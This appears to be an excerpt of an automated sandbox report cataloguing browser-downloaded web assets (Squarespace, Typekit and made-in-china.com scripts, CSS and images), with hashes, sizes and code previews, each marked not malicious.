                                                                                                          Preview:void function(){var e=location.hostname;if(/^[\d\.]+$/.test(e)){return}var t=/[\w\-]+\.[\w\-]+$/.exec(e)[0];var a=function e(){var a=false;var t=document.createElement("canvas");if(t.toDataURL){a=/^data:image\/webp/.test(t.toDataURL("image/webp"))}return a};var n=function e(a){var t=new Image;t.onload=function(){a(true)};t.onerror=function(){a(false)};t.src="data:image/webp;base64,UklGRiQAAABXRUJQVlA4IBgAAAAwAQCdASoBAAEAAUAmJaQAA3AA/vz0AAA="};var o=function e(a){document.cookie="webp="+(a||"t")+"; path=/; domain=."+t+"; expires="+new Date("2099-12-31").toUTCString()};if(a()){o("t")}else{n(function(e){if(e){o("t")}else{o("f")}})}}.call(this);.//# sourceMappingURL=../../../../__sources__/common/js/assets/feature/webp_a5985147.js.map.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):964067
                                                                                                          Entropy (8bit):5.76748783066743
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:78DA7C6E00D5BE800773AFE88ACA9F11
                                                                                                          SHA1:B207F4B187729C9557E62CDEAAE51D3A13B60518
                                                                                                          SHA-256:652C5EB9B250E4AA337DBAA55F2F79EDFCD3A77B63FE3A79759B35F8A7BAD9C7
                                                                                                          SHA-512:DE2A4FBC2883D52C2A6F35EB919E9FA8F487459D693793AA69E0BE6CD75BB232774B23801C4E07E85D35F4F4DCD233DBB5717F967BFE12FCCB5DDFA46CEBDB41
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://assets.squarespace.com/universal/scripts-compressed/commerce-140db3d537b6a957a66b-min.en-US.js
                                                                                                          Preview:(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[55155,40524,28872,13914],{454003:(S,s,r)=>{"use strict";r.d(s,{TZ:()=>L});var c=r(185856),e={zoneids:"Africa/Abidjan|Africa/Accra|Africa/Algiers|Africa/Bissau|Africa/Cairo|Africa/Casablanca|Africa/Ceuta|Africa/El_Aaiun|Africa/Johannesburg|Africa/Juba|Africa/Khartoum|Africa/Lagos|Africa/Maputo|Africa/Monrovia|Africa/Nairobi|Africa/Ndjamena|Africa/Sao_Tome|Africa/Tripoli|Africa/Tunis|Africa/Windhoek|America/Adak|America/Anchorage|America/Araguaina|America/Argentina/Buenos_Aires|America/Argentina/Catamarca|America/Argentina/Cordoba|America/Argentina/Jujuy|America/Argentina/La_Rioja|America/Argentina/Mendoza|America/Argentina/Rio_Gallegos|America/Argentina/Salta|America/Argentina/San_Juan|America/Argentina/San_Luis|America/Argentina/Tucuman|America/Argentina/Ushuaia|America/Asuncion|America/Atikokan|America/Bahia|America/Bahia_Banderas|America/Barbados|America/Belem|America/Belize|America/Blanc-Sablon|America/Boa_Vista|
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (40035)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):40215
                                                                                                          Entropy (8bit):5.341587059628471
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:31F89F7C3FCADC7AC9482862D28B2318
                                                                                                          SHA1:DB44A5BA2659381CE35B7BD28EB34BC46FAA4EE3
                                                                                                          SHA-256:B6E030AD2D4B16E1B747179F64E90A646D32D746986EC428AC26DB321C576B50
                                                                                                          SHA-512:AA04BB53C6D0655882E1328A31C0E211910959863D49BCE6825AF5F3653618F412D110AB4BE6173CB0A9DE6CE7F42C08F7BE5FA5042CD10041A7BB958AB02785
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://assets.squarespace.com/universal/scripts-compressed/performance-be9599e0923b14e6f074-min.en-US.js
                                                                                                          Preview:"use strict";(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[52730],{615921:(N,h)=>{Object.defineProperty(h,"__esModule",{value:!0}),h.default=void 0;var E;(function(f){f.MAIN_CONTENT=1,f.CONTENT_COLLECTION=1,f.PAGE=2,f.SPLASH_PAGE=3,f.CONTENT_ITEM=50,f.NOT_FOUND=100,f.ERROR=101,f.SEARCH=102,f.LOCK_SCREEN=103,f.POPUP_OVERLAY=104,f.PROTECTED_CONTENT=105,f.MEMBER_AREA_ACCESS_DENIED=106,f.PAYWALL=107,f.SHOW_CART=200,f.CHECKOUT=201,f.ORDER_CONFIRMED=202,f.DONATE=203,f.CONTRIBUTION_CONFIRMED=204,f.COMMERCE_CART_V2=205,f.SUBSCRIPTION_CONFIRMED=206,f.ORDER_RECEIVED=207,f.MEMBERSHIP_CONFIRMED=208,f.REVIEWS_REQUEST=209,f.DIGITAL_PRODUCT_COMPOSER_PREVIEW=210,f.ORDER_STATUS=211,f.NEWSLETTER_UNSUBSCRIBE=300,f.COMMERCE_EMAIL_PREVIEW=301,f.SSO_PAGE=400})(E||(E={}));var T=E;h.default=T,N.exports=h.default},795702:(N,h)=>{Object.defineProperty(h,"__esModule",{value:!0}),h.default=void 0;var E;(function(f){f.EXPIRED=1,f.PASTDUE=2,f.TRIAL=3,f.BETA=4,f.REMOVED=5,f.INTERNAL=6,f.COMP
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (712)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):806
                                                                                                          Entropy (8bit):5.096139400209187
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:7E50C33E92746EB0CADA945F52215066
                                                                                                          SHA1:5B016D4BDCB8A7B0C98365787A74FB455F780EAA
                                                                                                          SHA-256:95C7D8C22080C69A30901D2C08EF6295E97919332DDC54D422C1A761DC407860
                                                                                                          SHA-512:397D533F8107B125C8ADFD8D1C0699CA2FB9EA98714C70000318A37DEFE810DA0CD3EFB2D9289E31942490117E2A1D3B112E8009A94C9D181FDDF6772DE58128
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:void function(){function e(n,a){var o=null;return function(){var e=this;var t=arguments;clearTimeout(o);o=setTimeout(function(){n.apply(e,t)},a)}}if(window.sideBarInstance&&!localStorage.getItem("appAutoPop")){window.addEventListener("scroll",e(function(){var e=document.documentElement.clientHeight;var t=window.pageYOffset||document.documentElement.scrollTop;if(!localStorage.getItem("appAutoPop")&&t>e){sideBarInstance.appPopEle.classList.add("anim-in");localStorage.setItem("appAutoPop",true);setTimeout(function(){if(sideBarInstance.appPopEle.classList.contains("anim-in")){sideBarInstance.appPopEle.classList.remove("anim-in");sideBarInstance.appPopEle.classList.add("anim-out")}},5e3)}},20))}}.call(this);.//# sourceMappingURL=../../../__sources__/mic-search/js/home-2019/pcGuideApp_c79a16db.js.map.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 1 x 1, 8-bit colormap, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):98
                                                                                                          Entropy (8bit):4.449001237486164
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:FBE197947C692B0564FE59C94C80B4E5
                                                                                                          SHA1:3CC11FE7CC1B4139FD216E892EFCFB5DC05BC087
                                                                                                          SHA-256:F6E69BEBE667114F5AE4C4DA1448D6A5EE7644DDA264C33730CFF01418E51904
                                                                                                          SHA-512:F4AA708751BA7F9B3834C307B18BAFA24192328D656C3C80AD36B91280336457A2D27C8ED922D53710CA56A92EE7D37AE9B25EDAB7A4BA4CEAF19A8BFE2851B3
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.PNG........IHDR.............(.4.....PLTE......U..~....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (2258)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):17975
                                                                                                          Entropy (8bit):5.561439030081272
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:A3CCCE41241C8B7F99B722997D0926FD
                                                                                                          SHA1:E022F31394D57CCD5A36F78FD1AC1D883F198F4E
                                                                                                          SHA-256:1DE49043A77C1A59938365F07743A54536E93D3E4247C4E843E3324EBAF60DB1
                                                                                                          SHA-512:5A4A2A205057627B9575AD2A7BEBA0465FB3BD25ED861DFB8C6EEC400CF564F4F9AAF909A8AF36CE23887ED303280E787CB2E88213EA4DEA7F79278C73C9807F
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://use.typekit.net/ik/EJfPRwX5bhoHf3RUQXtxziG37crKuRtE9q6fPD-fy4MfeGtgfFHN4UJLFRbh52jhWDjhZcwkwQJujcbUwQqDwRqD5QM3wQwDjsGMJ6TyS14ypPuldhozJ6T0ZWSlSagTSc8XH6GJKiIfIMMjgfMfH6GJKNIfIMMjgkMfH6GJKlIfIMMj2KMfH6GJRFIfIMMjIPMfH6GJxpbfIMIjgPMfH6GJxrbfIMIjgkMfqMe13zfag6.js
                                                                                                          Preview:/*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * array-mono:. * - http://typekit.com/eulas/00000000000000007735cc67. * - http://typekit.com/eulas/00000000000000007735cc6c. * - http://typekit.com/eulas/00000000000000007735cc6a. * - http://typekit.com/eulas/00000000000000007735cc6d. * new-spirit:. * - http://typekit.com/eulas/00000000000000007735c4bc. * - http://typekit.com/eulas/00000000000000007735c4c0. *. * . 2009-2024 Adobe Systems Incorporated. All Rights Reserved.. */.if(!window.Typekit)window.Typekit={};window.Typekit.config={"a":"646866","fi":[43145,43147,43146,43148,45693,45695],"fc":[{"id":43145,"family":"array-mono","src":"https://use.typekit.net/af/053957/00000000000000007735cc67/30/{format}{?primer,subset_id,fvd,v}","descriptors":{"weight":"400","style":"normal"
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):64
                                                                                                          Entropy (8bit):4.58664727611327
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:5A54651F210E6D1DE0F0991615969513
                                                                                                          SHA1:F43AA97A3CF402ABD85A343C0D341838D5DBC317
                                                                                                          SHA-256:3CF3765C20D738AC365774CDAD6E44BFDB7365833C0E503A9CDE7A39B2EBD5C7
                                                                                                          SHA-512:65FE0450C9B4071AB631CDA528806E541FAAFF0CA5AD2BE88954163A0302BB008A6888F1ECC8165B60D0A6F764ABE3D5BF0E892759C3FD01792D35BA361F8EC7
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSLAmN6-D-jd3ytxIFDQS4b8gSBQ30VC8LEgUNnHJ-chIFDUwfEkYSBQ29tYv1?alt=proto
                                                                                                          Preview:Ci0KBw0EuG/IGgAKBw30VC8LGgAKBw2ccn5yGgAKBw1MHxJGGgAKBw29tYv1GgA=
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65465)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):188732
                                                                                                          Entropy (8bit):5.390544295893808
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:42E9FB50CD878C54618ADF9764BD2F64
                                                                                                          SHA1:B3B60EC849BA6C7310D1764432FBAF18B8C12758
                                                                                                          SHA-256:9DA6549CFAAC78AFD41B473BA4445A8577650A473094905D3309C51E3BB87BD0
                                                                                                          SHA-512:ADB7C4D74CDB1C5875FDA1A3477AE850C987567AE7AAB5177292F30980E0C376DB36CF7C24F3729808AE6D2EAB4EB3EC410F5C77A0D700331FB7607E4F98D21B
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:/*! For license information please see icon.df157752.js.LICENSE.txt */.!function(){var e={609:function(e,n,t){var r=t(70)("jsonp");e.exports=function(e,n,t){"function"==typeof n&&(t=n,n={});n||(n={});var i,l,u=n.prefix||"__jp",s=n.name||u+o++,c=n.param||"callback",f=null!=n.timeout?n.timeout:6e4,d=encodeURIComponent,p=document.getElementsByTagName("script")[0]||document.head;f&&(l=setTimeout((function(){h(),t&&t(new Error("Timeout"))}),f));function h(){i.parentNode&&i.parentNode.removeChild(i),window[s]=a,l&&clearTimeout(l)}return window[s]=function(e){r("jsonp got",e),h(),t&&t(null,e)},e=(e+=(~e.indexOf("?")?"&":"?")+c+"="+d(s)).replace("?&","?"),r('jsonp req "%s"',e),(i=document.createElement("script")).src=e,p.parentNode.insertBefore(i,p),function(){window[s]&&h()}};var o=0;function a(){}},70:function(e,n,t){function r(){var e;try{e=n.storage.debug}catch(t){}return!e&&"undefined"!==typeof process&&"env"in process&&(e={NODE_ENV:"production",PUBLIC_URL:"",WDS_SOCKET_HOST:void 0,WDS_SO
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):80
                                                                                                          Entropy (8bit):4.7305264852474656
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:40CF3F37D0822775E21B6228EB94B9C1
                                                                                                          SHA1:1892DB47F11A47DEA06063882B5E3B2F37D89819
                                                                                                          SHA-256:5508B57C5328C15001643B969A3C0B52DA28F6A9D169072A5BF60564CF736EE4
                                                                                                          SHA-512:64322DA54A54CAFE59CE96B831A148C0A4C52F19B4BAAC26D7C0D29085388BDD153DC06B3D55F268AD6026C0628ADAA194D953D7B697FB3D1614531516D65D68
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAnusiPwhEH6hBIFDbPIejoSLAmN6-D-jd3ytxIFDQS4b8gSBQ30VC8LEgUNnHJ-chIFDUwfEkYSBQ29tYv1?alt=proto
                                                                                                          Preview:CgkKBw2zyHo6GgAKLQoHDQS4b8gaAAoHDfRULwsaAAoHDZxyfnIaAAoHDUwfEkYaAAoHDb21i/UaAA==
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (19332)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21139
                                                                                                          Entropy (8bit):5.566201267708957
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:D3E6F20ED54713AB6D53941FA2FAAE0C
                                                                                                          SHA1:ACEFBD32229D7C907C80BE075F6B24E9864884EE
                                                                                                          SHA-256:4978BAB6B8CE7938415CFBBD1AEAF96E5D00AC99282D8BE41F7F61797F81552A
                                                                                                          SHA-512:190D9D4445A6492CEFC3E488A8F8D22B953C19C246F179B16C93701A1E4D25DC4E654EB60F2952724C9BBE7E4F3DE969C210515D3877618731DFD88448FFC41A
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[84467],{159393:(_,a)=>{"use strict";Object.defineProperty(a,"__esModule",{value:!0}),a.default=void 0;var t;(function(r){r.SUB_FOOTER="SUB_FOOTER",r.PILL="PILL",r.HIDDEN="HIDDEN"})(t||(t={}));var s=t;a.default=s,_.exports=a.default},418891:_=>{_.exports={"2a55ca78e8124468fd12f5631b591477":"Cookie banner","5c9e9d0cbf6046deb40eaa0a5c1722df":"These cookies provide quantitative measures of website visitors. With the usage of these cookies we are able to count visits and traffic sources to improve the performance of our site.","5d34f2ee7358fc231e5c0fb44bb6194d":"Close","67db752e6310686617e98c22c85b3963":"Necessary","6bf1c5ed97ddc6828e7cd5159df2a240":"Performance and Analytics","74472054366bb6c5316e7afadad1093e":"These cookies are used by advertising companies to serve ads that are relevant to your interests.","7f55fe8fa38cccf52495082b8a3b514e":"Required to enable core site functionality and to remember user preferences a
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):115181
                                                                                                          Entropy (8bit):5.010437254513214
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:E79D0E02E7516DE784124C5755955317
                                                                                                          SHA1:185467FB5740DCD91E59DE6BEA43CAFC517062AC
                                                                                                          SHA-256:AF995BF1334BA71776F5AD8D190E2A0CA359B84F46D5FF030747F11B029D7FD5
                                                                                                          SHA-512:7198F125D89671DA8E0ADCBEF97B916C18F5F11454BB1DA379925A62D4AC28A67D659AABE1E7DAC66977B5BC21882B058121F4D781C04CB46F0713A8A029969B
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/mic-search/css/home-2019/home_de3c8594.css
                                                                                                          Preview:.easy-sourcing .form-item,.easy-sourcing .sourcing-centent,.main-content,.section-centent,.grid,.cf{*zoom:1}.easy-sourcing .form-item:before,.easy-sourcing .sourcing-centent:before,.main-content:before,.section-centent:before,.grid:before,.cf:before,.easy-sourcing .form-item:after,.easy-sourcing .sourcing-centent:after,.main-content:after,.section-centent:after,.grid:after,.cf:after{content:"";display:table}.easy-sourcing .form-item:after,.easy-sourcing .sourcing-centent:after,.main-content:after,.section-centent:after,.grid:after,.cf:after{clear:both}@font-face{font-family:"Roboto";src:url("https://www.micstatic.com/common/fontastic/dist/assets/roboto/100-thin/Roboto-Thin_0a995487.eot") format("eot");src:local("Roboto Thin"),local("Roboto-Thin"),url("https://www.micstatic.com/common/fontastic/dist/assets/roboto/100-thin/Roboto-Thin_0a995487.eot?#iefix") format("embedded-opentype"),url("https://www.micstatic.com/common/fontastic/dist/assets/roboto/100-thin/Roboto-Thin_c0096edb.woff2")
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (834)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):923
                                                                                                          Entropy (8bit):5.26595091428773
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:DD455265F47C2A5CCFE62F41F620E294
                                                                                                          SHA1:912FDACD67599F440B145E3EADD20ECA53CDFD4B
                                                                                                          SHA-256:8112E630A763C7A18C62F2B75FAB7E1937DED9278B0CBA8C0D5A4798A2835702
                                                                                                          SHA-512:9FE7D6DA517EC9BBAE07F126E19C7C60E8F6F80D842E16C07F0F6055338AF403F7CFB262F82DD7B0A1FC9B11EA8498E7C7DEDF8AC37042DEBC8D7F3C96CAF715
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/common/js/assets/anti/anti_c9e40611.js
                                                                                                          Preview:void function(){var a=window.location;if(/^192\.168\.\d+\.\d+$/.test(a.hostname)){return}var r="mad";var e="e-i";var t="n-ch";var o="ina";var c=[r,e,t,o].join("");var i="vemic";var n="e-cigaretteschina";var v="micstatic";var w="bmic\\.org\\.cn";var h="com";var l="www";var m="crov";var s=new RegExp("(?:^|\\.)(?:(?:"+[c,i,v,n,m].join("|")+")\\."+h+"|"+w+")$","i");var f=/^[\w\-]+\.[\w\-]+$/;var d=window.self!==window.top;var p=document.referrer;var $;if(p){$=p.match(/^\w+:\/\/([^\/]*)/)[1];$=$.replace(/\:\d+$/,"")}if(d&&$&&!s.test($)){var u=window.top;var g=a.href;try{u.location.replace?u.location.replace(g):u.location.href=g}catch(a){u.top.location=g}return}if(!s.test(a.hostname)){var g=a.href.replace(a.hostname.match(/[\w\-]+\.[\w\-]+$/)[0],(f.test(a.hostname)?l+".":"")+c+"."+h);a.replace?a.replace(g):a.href=g}}.call(this);.//# sourceMappingURL=../../../../__sources__/common/js/assets/anti/anti_c9e40611.js.map.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (43878), with NEL line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):117609
                                                                                                          Entropy (8bit):5.452021285934095
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:93A2AEA230D421D550375C528B22583E
                                                                                                          SHA1:E8D88B00DB1C30510928A7C6618F0F7CFFA9B4C2
                                                                                                          SHA-256:54E832663426C696B1F603379026E5E15720E8C812BBBC60D63AA2AD8A479F75
                                                                                                          SHA-512:2BA5180B32FCD62B7A430E75C8CD8022076563299F055AD99B836AFBAEB39D205D825B2848E0686F7E136502EAAE91B39B4659D6C1F6A0895C16FA5515494EED
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:(()=>{var t,r={481:(t,r,e)=>{var n=e(8807),o=e(8427),i=TypeError;t.exports=function(t){if(n(t))return t;throw i(o(t)+" is not a function")}},2420:(t,r,e)=>{var n=e(1758),o=e(8427),i=TypeError;t.exports=function(t){if(n(t))return t;throw i(o(t)+" is not a constructor")}},5946:(t,r,e)=>{var n=e(8807),o=String,i=TypeError;t.exports=function(t){if("object"==typeof t||n(t))return t;throw i("Can't set "+o(t)+" as a prototype")}},3288:(t,r,e)=>{var n=e(6982),o=e(6042),i=e(189).f,a=n("unscopables"),s=Array.prototype;null==s[a]&&i(s,a,{configurable:!0,value:o(null)}),t.exports=function(t){s[a][t]=!0}},5158:(t,r,e)=>{"use strict";var n=e(3100).charAt;t.exports=function(t,r,e){return r+(e?n(t,r).length:1)}},5712:(t,r,e)=>{var n=e(3521),o=TypeError;t.exports=function(t,r){if(n(r,t))return t;throw o("Incorrect invocation")}},1843:(t,r,e)=>{var n=e(1188),o=String,i=TypeError;t.exports=function(t){if(n(t))return t;throw i(o(t)+" is not an object")}},7603:t=>{t.exports="undefined"!=typeof ArrayBuffer&
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2754
                                                                                                          Entropy (8bit):7.7745355473746205
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:E65A6F5F5753D6616F30CAA3BAD529A1
                                                                                                          SHA1:95870E0F370B9F76D0808D41B9F9679F8BE32201
                                                                                                          SHA-256:9C61CAEFCF095930037FFDCC832097F09BD5969661CC8E926D8F685216612CA4
                                                                                                          SHA-512:0E926AEE3A83B102DB5C71D9ADEFFFCB33E6368D4F19F66A4FF82621452842C2036EA4F622FDD513E15F83CBCF6B826031C1FD1248EE62C3DFB6A0C951FF49EB
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:......Exif..II*.................Ducky.......U......Adobe.d.................................................................................................................................................2.2.............................................................................................!..1....A.a"#Qq..2Br.%.......................!1...Q.Aa.q.".....b.#..2r.S.T.............?../..V.L...*n8j.""....DDM.Vga.....-_..0.....el.`.u^]...Lm.....gi/w.Eu.......[....?}*n3.....!8.B(.{N.;-Z....vBM..Uw..P.C...%o...n......:3..P......8..s.:.?....b.e..QG..`H&..`#@.../.H..mG<...;..5o.g7g...zkS.......#...g..k,f...x.).}...N.w.yFI...."..o,..{.........ol......e....r...X.x`M.....x...."{....\..o..j......#.v...>.....m..5*.q......T<.._q.a.........X..4=+u....Y..5>:.s95.#..g.8... |.r.W.7.D[AeEU.UMA./~V=h..iZ.!.N.vm...J.....{s..4........\.>.,.*....*..r.<9.9c...J..H;..=.......m7'3...6.I.Us.Qr....WQ...c..(...R..L..(.u<w}...,..W.Y....|.Dy..O.n.y.....}.m..D.w.e.Y..c..%E.k..../
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (20901)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):20933
                                                                                                          Entropy (8bit):5.247086114445981
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:08D825D5B3CED6DCBD41248FFB80F9D1
                                                                                                          SHA1:6450298282157319B6F76BDF09D26B7140E5EE4E
                                                                                                          SHA-256:DE3062B82A6C4988543699C847E53AF7D3B61A765BD9588EDB07DC41FF2CA179
                                                                                                          SHA-512:F0916CAF6429755F0B09FBA3A9EF18B2CB8CDA5286F504A936E69B942EB363618D4A287C81257524AD9DBFF7E9A6C9F445CCE662E34F241FF7A1D1D393E75246
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://discovery.micstatic.com/mic.probe.js?r=1727402485614
                                                                                                          Preview:/* August 19, 2024 09:42:28 */.(()=>{{Array.prototype.forEach||(Array.prototype.forEach=function(e){for(var t=0;t<this.length;t++)e&&e(this[t])}),"function"!=typeof Object.assign&&(Object.assign=function(e){if(null==e)throw new TypeError("Cannot convert undefined or null to object");for(var t=Object(e),i=1;i<arguments.length;i++){var n=arguments[i];if(null!=n)for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(t[r]=n[r])}return t});let t=Object.prototype.toString,i=window,n=document;function S(e){return"[object Array]"===t.call(e)}function C(e){return"[object Object]"===t.call(e)}function k(e){if(null==e)throw new TypeError("Cannot convert undefined or null to object");var t=Object(e);for(let e=1;e<arguments.length;e++){var i=arguments[e];if(null!=i)for(var n in i)Object.prototype.hasOwnProperty.call(i,n)&&(t[n]&&"[object Object]"===Object.prototype.toString.call(t[n])&&"[object Object]"===Object.prototype.toString.call(i[n])?t[n]=k({},t[n],i[n]):t[n]=i[n])}return t}let E=i.addE
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (11201)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):11293
                                                                                                          Entropy (8bit):5.156924483371058
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:2B5AF57CFEC4E6803A640EA6757E5C07
                                                                                                          SHA1:3663B8140B5B3BF78B009CE1C9CE9B6591D36F70
                                                                                                          SHA-256:9657FF2FAC53B62459F85762FF8CCE9744FBE4D1D36889AF2BE465C58D0E2903
                                                                                                          SHA-512:FEA4CAAD5DBDB387770BBEE1C7241A72F013552F948DEE66B0E8900AAD8D97DC39D5E458CE739B3CE1F363284A39CAF198126C6C65BAF635FFA532805674D153
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/mic-search/js/home-2019/lazyload_82b285d4.js
                                                                                                          Preview:function _typeof(t){"@babel/helpers - typeof";return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},_typeof(t)}!function(t,e){"object"==(typeof exports==="undefined"?"undefined":_typeof(exports))&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).Lazyload=e()}(this,function(){"use strict";function n(t,e,o){return e in t?Object.defineProperty(t,e,{value:o,enumerable:!0,configurable:!0,writable:!0}):t[e]=o,t}function c(t,e){if(null==t)return{};var o,n,r=function(t,e){if(null==t)return{};var o,n,r={},i=Object.keys(t);for(n=0;n<i.length;n++)o=i[n],e.indexOf(o)>=0||(r[o]=t[o]);return r}(t,e);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(t);for(n=0;n<i.length;n++)o=i[n],e.indexOf(o)>=0||Object.prototype.propertyIs
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):3541
                                                                                                          Entropy (8bit):7.931107557187087
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:96884C8F50FB8B68E3BD4CC9E9216BD4
                                                                                                          SHA1:9D949B12A74A36D0835C5655AF8FEEBC20EE80FF
                                                                                                          SHA-256:EE927D05792C395F7D6049671CA0E369DC310508836029F765EBA7169E7D6921
                                                                                                          SHA-512:B8A7F69F34A21A8F45873E1E37740FBD49F5F4B86292B2E9AF8277D3D44685F0C72F3FEFD8580C77F10C733DDE2336E70F25401381AB04CCF1902B89D3C3F7A3
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://pic.made-in-china.com/61f54j00lQaTudDJIEiz/China-Industry-Brands.jpg
